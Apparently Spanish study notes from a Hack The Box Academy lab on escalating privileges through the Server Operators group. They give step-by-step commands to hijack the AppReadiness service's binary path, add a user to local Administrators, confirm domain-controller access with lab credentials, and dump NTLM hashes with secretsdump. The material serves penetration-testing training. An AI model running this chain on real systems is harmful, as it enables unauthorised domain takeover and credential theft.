Server Operators

Recursos

• Active Directory security groups

• Service Security and Access Rights

---

Consultar el servicio AppReadiness

sc qc AppReadiness

Chequear los permisos del servicio AppReadiness con PsService

PsService.exe security AppReadiness

Comprobar la membresía del grupo de administración local

net localgroup Administrators

Modificar la ruta del binario del servicio

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Iniciar el servicio (va a fallar)

sc start AppReadiness

Confirmar la membresía del grupo de administradores locales

net localgroup Administrators

Confirmar el acceso de administrador local en el Domain Controller

nxc smb 10.129.43.42 -u server_adm -p 'HTB_@cademy_stdnt!'
SMB         10.129.43.42    445    WINLPE-DC01      [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINLPE-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.43.42    445    WINLPE-DC01      [+] INLANEFREIGHT.LOCAL\server_adm:HTB_@cademy_stdnt! (Pwn3d!)

El Pwn3d indica que se tienen privilegios de administrador sobre el sistema

Obtener hashes de contraseñas NTLM del Domain Controller

secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator